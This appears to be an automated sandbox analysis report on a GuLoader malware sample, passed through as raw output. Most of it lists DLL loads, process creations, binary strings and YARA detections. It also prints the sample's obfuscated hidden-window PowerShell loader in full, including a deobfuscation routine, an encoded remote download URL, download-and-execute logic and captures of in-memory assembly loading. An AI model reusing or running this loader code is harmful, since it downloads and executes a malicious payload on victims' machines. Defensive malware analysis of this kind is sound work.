LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronInJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.PDB source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Configuration.pdb|c,s@ source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: Accessibility.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1682044928.0000000007C22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Accessibility.pdb" source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbk8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: $%symbols\dll\mscorlib.pdbLb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: h1%HPRo0C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: ?^oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: 4%%%.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: 1%C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbhWa source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: wab.pdb source: wab.exe, 0000000F.00000002.3136825596.000000002533F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbh source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Program Files (x86)\windows mail\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025368000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\symbols\exe\wab.pdbK source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025341000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp, WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\wab.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbJ# source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb_ source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Management.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: wab.exe, 0000000F.00000002.3136825596.0000000025310000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: @^o.pdb source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbr8 source: wab.exe, 0000000F.00000002.3136825596.000000002534A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 \ source: wab.exe, 0000000F.00000002.3121592482.00000000075C0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb@@_ source: wab.exe, 0000000F.00000002.3136237540.000000002524A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERF2D5.tmp.dmp.23.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERF2D5.tmp.dmp.23.dr

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000C.00000002.1682745414.000000000A8FD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1682604695.00000000080A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1672297363.0000000005654000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($galvanotactic)$global:Valmuen = [System.Text.Encoding]::ASCII.GetString($Convolvuluses62)$global:Bottomlessness=$Valmuen.substring($Uncoincident,$Vasiferous)<#optagelsesprver Rigors
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((kiddushes $Udhales $Plankonomi), (Prsentationens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Rebeset = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Poliskestes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Baryts, $false).DefineType($Arbejdsledere, $u
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($galvanotactic)$global:Valmuen = [System.Text.Encoding]::ASCII.GetString($Convolvuluses62)$global:Bottomlessness=$Valmuen.substring($Uncoincident,$Vasiferous)<#optagelsesprver Rigors
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPa
